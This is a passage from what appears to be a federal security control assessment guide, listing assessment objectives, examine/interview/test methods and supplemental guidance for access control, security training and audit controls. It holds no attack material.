| Determine if the organization permits actions to be performed without identification and authentication only to the extent necessary to accomplish mission objectives. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing permitted actions without identification and authentication; information system configuration settings and associated documentation; list of organization-defined actions that can be performed without identification and authentication; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for defining permitted actions without identification and authentication]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-15 | AUTOMATED MARKING |
| Control: The information system marks output using standard naming conventions to identify any special dissemination, handling, or distribution instructions. | |
| Supplemental Guidance: Automated marking refers to markings employed on external media (e.g., hardcopy documents output from the information system). The markings used in external marking are distinguished from the labels used on internal data structures described in AC-16. | |
| AC-15.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies standard naming conventions for identification of special dissemination, handling, or distribution instructions; and | |
| (ii) the information system marks output using standard naming conventions to identify any special dissemination, handling, or distribution instructions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures for addressing automated marking of information system output; information system output; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for defining special dissemination, handling, and marking instructions for information system output]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing automated marking of information system output]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-16 | AUTOMATED LABELING |
| Control: The information system appropriately labels information in storage, in process, and in transmission. | |
| Supplemental Guidance: Automated labeling refers to labels employed on internal data structures (e.g., records, files) within the information system. Information labeling is accomplished in accordance with: (i) access control requirements; (ii) special dissemination, handling, or distribution instructions; or (iii) as otherwise required to enforce information system security policy. | |
| AC-16.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system appropriately labels information in storage, in process, and in transmission. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing automated (internal) labeling of information within the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing automated (internal) labeling within the information system]. |
| ASSESSMENT PROCEDURE | |
| AC-17 | REMOTE ACCESS |
| Control: The organization authorizes, monitors, and controls all methods of remote access to the information system. | |
| Supplemental Guidance: Remote access is any access to an organizational information system by a user (or an information system) communicating through an external, non- organization-controlled network (e.g., the Internet). Examples of remote access methods include dial-up, broadband, and wireless. Remote access controls are applicable to information systems other than public web servers or systems specifically designed for public access. The organization restricts access achieved through dial-up connections (e.g., limiting dial-up access based upon source of request) or protects against unauthorized connections or subversion of authorized connections (e.g., using virtual private network technology). NIST Special Publication 800-63 provides guidance on remote electronic authentication. If the federal Personal Identity Verification (PIV) credential is used as an identification token where cryptographic token-based access control is employed, the access control system conforms to the requirements of FIPS 201 and NIST Special Publications 800-73 and 800-78. NIST Special Publication 800-77 provides guidance on IPsec-based virtual private networks. Related security control: IA- 2. | |
| AC-17.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization authorizes, monitors, and controls remote access to the information system for all allowed methods of remote access to include both establishment of the remote connection and subsequent user actions across that connection. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with remote access authorization, monitoring, and control responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Remote access methods for the information system]. (H) | |
| AC-17(1) | REMOTE ACCESS |
| Control Enhancement: | |
| The organization employs automated mechanisms to facilitate the monitoring and control of remote access methods. | |
| AC-17(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs automated mechanisms to facilitate the monitoring and control of remote access methods. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for remote access]. (H) | |
| AC-17(2) | REMOTE ACCESS |
| Control Enhancement: | |
| The organization uses cryptography to protect the confidentiality and integrity of remote access sessions. | |
| AC-17(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs cryptography to protect the confidentiality and integrity of remote access sessions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing cryptographic protections for remote access]. (H) | |
| AC-17(3) | REMOTE ACCESS |
| Control Enhancement: | |
| The organization controls all remote accesses through a limited number of managed access control points. | |
| AC-17(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines managed access control points for remote access to the information system; and | |
| (ii) the information system controls all remote accesses through a limited number of managed access control points. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system design documentation; list of managed access control points; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for remote access]. (H) | |
| AC-17(4) | REMOTE ACCESS |
| Control Enhancement: | |
| The organization permits remote access for privileged functions only for compelling operational needs and documents the rationale for such access in the security plan for the information system. | |
| AC-17(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the situations and compelling operational needs when remote access to privileged functions on the information system is allowed; and | |
| (ii) the organization permits remote access for privileged functions only for compelling operational needs and documents the rationale for such access in the security plan for the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; security plan; information system audit records; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| AC-18 | WIRELESS ACCESS RESTRICTIONS |
| Control: The organization: (i) establishes usage restrictions and implementation guidance for wireless technologies; and (ii) authorizes, monitors, controls wireless access to the information system. | |
| Supplemental Guidance: NIST Special Publications 800-48 and 800-97 provide guidance on wireless network security. NIST Special Publication 800-94 provides guidance on wireless intrusion detection and prevention. | |
| AC-18.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes usage restrictions and implementation guidance for wireless technologies; | |
| (ii) the organization authorizes, monitors, and controls wireless access to the information system; and | |
| (iii) the wireless access restrictions are consistent with NIST Special Publications 800- 48 and 800-97. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); NIST Special Publications 800-48 and 800-97; activities related to wireless authorization, monitoring, and control; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel responsible for authorizing, monitoring, or controlling the use of wireless technologies in the information system]. (M) (H) | |
| Test: [SELECT FROM: Wireless access usage and restrictions]. (M) (H) | |
| AC-18(1) | WIRELESS ACCESS RESTRICTIONS |
| Control Enhancement: | |
| The organization uses authentication and encryption to protect wireless access to the information system. | |
| AC-18(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization uses authentication and encryption to protect wireless access to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for wireless access to the information system]. (H) | |
| AC-18(2) | WIRELESS ACCESS RESTRICTIONS |
| Control Enhancement: | |
| The organization scans for unauthorized wireless access points [Assignment: organization- defined frequency] and takes appropriate action if such an access points are discovered. | |
| Enhancement Supplemental Guidance: Organizations conduct a thorough scan for unauthorized wireless access points in facilities containing high-impact information systems. The scan is not limited to only those areas within the facility containing the high-impact information systems. | |
| AC-18(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of scans for unauthorized wireless access points; and | |
| (ii) the organization scans for unauthorized wireless access points in accordance with organization-defined frequency and takes appropriate action if such an access points are discovered. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); wireless scanning reports; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Scanning procedure for unauthorized wireless access points]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-19 | ACCESS CONTROL FOR PORTABLE AND MOBILE DEVICES |
| Control: The organization: (i) establishes usage restrictions and implementation guidance for organization-controlled portable and mobile devices; and (ii) authorizes, monitors, and controls device access to organizational information systems. | |
| Supplemental Guidance: Portable and mobile devices (e.g., notebook computers, personal digital assistants, cellular telephones, and other computing and communications devices with network connectivity and the capability of periodically operating in different physical locations) are only allowed access to organizational information systems in accordance with organizational security policies and procedures. Security policies and procedures include device identification and authentication, implementation of mandatory protective software (e.g., malicious code detection, firewall), configuration management, scanning devices for malicious code, updating virus protection software, scanning for critical software updates and patches, conducting primary operating system (and possibly other resident software) integrity checks, and disabling unnecessary hardware (e.g., wireless, infrared). Protecting information residing on portable and mobile devices (e.g., employing cryptographic mechanisms to provide confidentiality and integrity protections during storage and while in transit when outside of controlled areas) is covered in the media protection family. Related security controls: MP-4, MP-5. | |
| AC-19.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes usage restrictions and implementation guidance for organization-controlled portable and mobile devices; and | |
| (ii) the organization authorizes, monitors, and controls device access to organizational information systems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing access control for portable and mobile devices; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel who use portable and mobile devices to access the information system]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access control policy for portable and mobile devices]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-20 | USE OF EXTERNAL INFORMATION SYSTEMS |
| Control: The organization establishes terms and conditions for authorized individuals to: | |
| (i) access the information system from an external information system; and (ii) process, store, and/or transmit organization-controlled information using an external information system. | |
| Supplemental Guidance: External information systems are information systems or components of information systems that are outside of the accreditation boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External information systems include, but are not limited to, personally owned information systems (e.g., computers, cellular telephones, or personal digital assistants); privately owned computing and communications devices resident in commercial or public facilities (e.g., hotels, convention centers, or airports); information systems owned or controlled by nonfederal governmental organizations; and federal information systems that are not owned by, operated by, or under the direct control of the organization. | |
| Authorized individuals include organizational personnel, contractors, or any other individuals with authorized access to the organizational information system. This control does not apply to the use of external information systems to access organizational information systems and information that are intended for public access (e.g., individuals accessing federal information through public interfaces to organizational information systems). The organization establishes terms and conditions for the use of external information systems in accordance with organizational security policies and procedures. The terms and conditions address as a minimum; (i) the types of applications that can be accessed on the organizational information system from the external information system; and (ii) the maximum FIPS 199 security category of information that can be processed, stored, and transmitted on the external information system. | |
| AC-20.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization establishes terms and conditions for authorized individuals to access the information system from an external information system that include the types of applications that can be accessed on the organizational information system from the external information system and the maximum FIPS 199 security category of information that can be processed, stored, and transmitted on the external information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing the use of external information systems; external information systems terms and conditions; list of types of applications accessible from external information systems; maximum FIPS 199 impact level for information processed, stored, or transmitted on external information systems; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for defining terms and conditions for use of external information systems to access organizational systems]. (M) (H) | |
| AC-20(1) | USE OF EXTERNAL INFORMATION SYSTEMS |
| Control Enhancement: | |
| The organization prohibits authorized individuals from using an external information system to access the information system or to process, store, or transmit organization-controlled information except in situations where the organization: (i) can verify the employment of required security controls on the external system as specified in the organization's information security policy and system security plan; or (ii) has approved information system connection or processing agreements with the organizational entity hosting the external information system. | |
| AC-20(1).1 | ASSESSMENT OBJECTIVE: |
Determine if the organization prohibits authorized individuals from using an external information system to access the information system or to process, store, or transmit organization-controlled information except in situations where the organization:
| |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing the use of external information systems; security plan; information system configuration settings and associated documentation; information system connection or processing agreements; account management documents; other relevant documents or records]. (M) (H) |
FAMILY:
Awareness and Training
| ASSESSMENT PROCEDURE | |
| AT-1 | SECURITY AWARENESS AND TRAINING POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, security awareness and training policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security awareness and training policy and associated security awareness and training controls. | |
| Supplemental Guidance: The security awareness and training policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security awareness and training policy can be included as part of the general information security policy for the organization. Security awareness and training procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publications 800-16 and 800-50 provide guidance on security awareness and training. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| AT-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents security awareness and training policy and procedures; | |
| (ii) the organization disseminates security awareness and training policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review security awareness and training policy and procedures; and | |
| (iv) the organization updates security awareness and training policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security awareness and training responsibilities]. (H) | |
| AT-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the security awareness and training policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the security awareness and training policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the security awareness and training procedures address all areas identified in the security awareness and training policy and address achieving policy-compliant implementations of all associated security awareness and training controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security awareness and training responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| AT-2 | SECURITY AWARENESS |
| Control: The organization provides basic security awareness training to all information system users (including managers and senior executives) before authorizing access to the system, when required by system changes, and [Assignment: organization-defined frequency, at least annually] thereafter. | |
| Supplemental Guidance: The organization determines the appropriate content of security awareness training based on the specific requirements of the organization and the information systems to which personnel have authorized access. The organization's security awareness program is consistent with the requirements contained in C.F.R. Part 5 Subpart C (5 C.F.R 930.301) and with the guidance in NIST Special Publication 800-50. | |
| AT-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization provides basic security awareness training to all information system users (including managers and senior executives) before authorizing access to the system and when required by system changes; | |
| (ii) the security awareness training is consistent with applicable regulations and NIST Special Publication 800-50; | |
| (iii) the security awareness and training materials address the specific requirements of the organization and the information systems to which personnel have authorized access; | |
| (iv) the organization defines in the security plan, explicitly or by reference, the frequency of refresher security awareness training and the frequency is at least annually; and | |
| (v) the organization provides refresher security awareness training in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security awareness training implementation; NIST Special Publication 800-50; appropriate codes of federal regulations; security awareness training curriculum; security awareness training materials; security plan; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel comprising the general information system user community]. (H) |
| ASSESSMENT PROCEDURE | |
| AT-3 | SECURITY TRAINING |
| Control: The organization identifies personnel that have significant information system security roles and responsibilities during the system development life cycle, documents those roles and responsibilities, and provides appropriate information system security training: (i) before authorizing access to the system or performing assigned duties; (ii) when required by system changes; and (iii) [Assignment: organization-defined frequency] thereafter. | |
| Supplemental Guidance: The organization determines the appropriate content of security training based on the specific requirements of the organization and the information systems to which personnel have authorized access. In addition, the organization provides system managers, system and network administrators, and other personnel having access to system-level software, adequate technical training to perform their assigned duties. The organization's security training program is consistent with the requirements contained in C.F.R. Part 5 Subpart C (5 C.F.R 930.301) and with the guidance in NIST Special Publication 800-50. | |
| AT-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies personnel with significant information system security responsibilities and roles and documents those roles and responsibilities; | |
| (ii) the organization provides security training to personnel with identified information system security roles and responsibilities before authorizing access to the system or performing assigned duties and when required by system changes; | |
| (iii) the security training materials address the procedures and activities necessary to fulfill the organization-defined roles and responsibilities for information system security; | |
| (iv) the security training is consistent with applicable regulations and NIST Special Publication 800-50; | |
| (v) the organization defines in the security plan, explicitly or by reference, the frequency of refresher security training; and | |
| (vi) the organization provides refresher security training in accordance with organization-defined frequency, at least annually. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security training implementation; NIST Special Publication 800-50; codes of federal regulations; security training curriculum; security training materials; security plan; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with significant information system security responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| AT-4 | SECURITY TRAINING RECORDS |
| Control: The organization documents and monitors individual information system security training activities including basic security awareness training and specific information system security training. | |
| Supplemental Guidance: None. | |
| AT-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization monitors and documents basic security awareness training and specific information system security training. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security training records; security awareness and training records; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| AT-5 | CONTACTS WITH SECURITY GROUPS AND ASSOCIATIONS |
| Control: The organization establishes and maintains contacts with special interest groups, specialized forums, professional associations, news groups, and/or peer groups of security professionals in similar organizations to stay up to date with the latest recommended security practices, techniques, and technologies and to share the latest security-related information including threats, vulnerabilities, and incidents. | |
| Supplemental Guidance: To facilitate ongoing security education and training for organizational personnel in an environment of rapid technology changes and dynamic threats, the organization establishes and institutionalizes contacts with selected groups and associations within the security community. The groups and associations selected are in keeping with the organization's mission requirements. Information sharing activities regarding threats, vulnerabilities, and incidents related to information systems are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. | |
| AT-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization establishes and maintains contact with special interest groups, specialized forums, or professional associations to keep current with state-of-the- practice security techniques and technologies and to share security-related information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security awareness and training policy; procedures addressing contacts with security groups and associations; list of organization-defined key contacts to obtain ongoing information system security knowledge, expertise, and general information; other relevant documents or records]. |
FAMILY:
Audit and Accountability
| ASSESSMENT PROCEDURE | |
| AU-1 | AUDIT AND ACCOUNTABILITY POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, audit and accountability policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the audit and accountability policy and associated audit and accountability controls. | |
| Supplemental Guidance: The audit and accountability policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The audit and accountability policy can be included as part of the general information security policy for the organization. Audit and accountability procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| AU-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents audit and accountability policy and procedures; | |
| (ii) the organization disseminates audit and accountability policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review audit and accountability policy and procedures; and | |
| (iv) the organization updates audit and accountability policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with audit and accountability responsibilities]. (H) | |
| AU-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the audit and accountability policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the audit and accountability policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the audit and accountability procedures address all areas identified in the audit and accountability policy and address achieving policy-compliant implementations of all associated audit and accountability controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with audit and accountability responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-2 | AUDITABLE EVENTS |
| Control: The information system generates audit records for the following events: [Assignment: organization-defined auditable events]. | |
| Supplemental Guidance: The purpose of this control is to identify important events which need to be audited as significant and relevant to the security of the information system. The organization specifies which information system components carry out auditing activities. Auditing activity can affect information system performance. Therefore, the organization decides, based upon a risk assessment, which events require auditing on a continuous basis and which events require auditing in response to specific situations. Audit records can be generated at various levels of abstraction, including at the packet level as information traverses the network. Selecting the right level of abstraction for audit record generation is a critical aspect of an audit capability and can facilitate the identification of root causes to problems. Additionally, the security audit function is coordinated with the network health and status monitoring function to enhance the mutual support between the two functions by the selection of information to be recorded by each function. The checklists and configuration guides at http://csrc.nist.gov/pcig/cig.html provide recommended lists of auditable events. The organization defines auditable events that are adequate to support after-the-fact investigations of security incidents. NIST Special Publication 800-92 provides guidance on computer security log management. | |
| AU-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, information system auditable events; | |
| (ii) the organization-defined auditable events include those deemed by the organization to be adequate to support after-the-fact investigations of security incidents; | |
| (iii) the information system generates audit records for the organization-defined auditable events; | |
| (iv) the organization specifies which information system components carry out auditing activities; and | |
| (v) the organization decides, based upon a risk assessment, which events require auditing on a continuous basis and which events require auditing in response to specific situations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system auditing of organization-defined auditable events]. (H) | |
| AU-2(1) | AUDITABLE EVENTS |
| Control Enhancement: | |
| The information system provides the capability to compile audit records from multiple components throughout the system into a systemwide (logical or physical), time-correlated audit trail. | |
| AU-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system has the capability to compile audit records from the more than one component within the information system into a systemwide (logical or physical), time-correlated audit trail. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; information system design documentation; information system configuration settings and associated documentation; list of organization-defined auditable events; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing a system-wide auditing capability]. (H) | |
| AU-2(2) | AUDITABLE EVENTS |
| Control Enhancement: | |
| The information system provides the capability to manage the selection of events to be audited by individual components of the system. | |
| AU-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides the capability to manage the selection of events to be audited by individual components of the system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; information system design documentation; information system configuration settings and associated documentation; list of organization-defined auditable events; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing Information system auditing for the specified components of the information system]. (H) | |
| AU-2(3) | AUDITABLE EVENTS |
| Control Enhancement: | |
| The organization periodically reviews and updates the list of organization-defined auditable events. | |
| AU-2(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization periodically reviews and updates the list of organization- defined auditable events. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; list of organization-defined auditable events; information system audit records; information system incident reports; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with auditing and accountability responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-3 | CONTENT OF AUDIT RECORDS |
| Control: The information system produces audit records that contain sufficient information to establish what events occurred, the sources of the events, and the outcomes of the events. | |
| Supplemental Guidance: Audit record content includes, for most audit records: (i) date and time of the event; (ii) the component of the information system (e.g., software component, hardware component) where the event occurred; (iii) type of event; (iv) user/subject identity; and (v) the outcome (success or failure) of the event. NIST Special Publication 800-92 provides guidance on computer security log management. | |
| AU-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the information system audit records capture sufficient information to establish what events occurred; | |
| (ii) the information system audit records capture sufficient information to establish the sources of the events; and | |
| (iii) the information system audit records capture sufficient information to establish the outcomes of the events. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; list of organization-defined auditable events; information system audit records; information system incident reports; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system auditing of auditable events]. (H) | |
| AU-3(1) | CONTENT OF AUDIT RECORDS |
| Control Enhancement: | |
| The information system provides the capability to include additional, more detailed information in the audit records for audit events identified by type, location, or subject. | |
| AU-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides the capability to include additional, more detailed information in the audit records for audit events identified by type, location, or subject. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; information system design documentation; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Information system audit capability to include more detailed information in audit records for audit events identified by type, location, or subject]. (H) | |
| AU-3(2) | CONTENT OF AUDIT RECORDS |
| Control Enhancement: | |
| The information system provides the capability to centrally manage the content of audit records generated by individual components throughout the system. | |
| AU-3(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides the capability to centrally manage the content of audit records generated from multiple components throughout the system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; information system design documentation; list of organization-defined auditable events; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing centralized management of audit record content]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-4 | AUDIT STORAGE CAPACITY |
| Control: The organization allocates sufficient audit record storage capacity and configures auditing to reduce the likelihood of such capacity being exceeded. | |
| Supplemental Guidance: The organization provides sufficient audit storage capacity, taking into account the auditing to be performed and the online audit processing requirements. Related security controls: AU-2, AU-5, AU-6, AU-7, SI-4. | |
| AU-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization allocates sufficient audit record storage capacity; and | |
| (ii) the organization configures auditing to reduce the likelihood of audit record storage capacity being exceeded. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit storage capacity; information system design documentation; organization-defined audit record storage capacity for information system components that store audit records; list of organization-defined auditable events; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| AU-5 | RESPONSE TO AUDIT PROCESSING FAILURES |
| Control: The information system alerts appropriate organizational officials in the event of an audit processing failure and takes the following additional actions: [Assignment: organization-defined actions to be taken (e.g., shut down information system, overwrite oldest audit records, stop generating audit records)]. | |
| Supplemental Guidance: Audit processing failures include, for example, software/hardware errors, failures in the audit capturing mechanisms, and audit storage capacity being reached or exceeded. Related security control: AU-4. | |
| AU-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, actions to be taken in the event of an audit processing failure; | |
| (ii) the organization defines in the security plan, explicitly or by reference, personnel to be notified in case of an audit processing failure; and | |
| (iii) the information system alerts appropriate organizational officials and takes any additional organization-defined actions in the event of an audit failure, to include audit storage capacity being reached or exceeded. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; list of personnel to be notified in case of an audit processing failure; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system response to audit processing failures]. (H) | |
| AU-5(1) | RESPONSE TO AUDIT PROCESSING FAILURES |
| Control Enhancement: | |
| The information system provides a warning when allocated audit record storage volume reaches [Assignment: organization-defined percentage of maximum audit record storage capacity]. | |
| AU-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the percentage of maximum audit record storage capacity that, if reached, requires a warning to be provided; | |
| (ii) the information system provides a warning when the allocated audit record storage volume reaches the organization-defined percentage of maximum audit record storage capacity. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H) | |
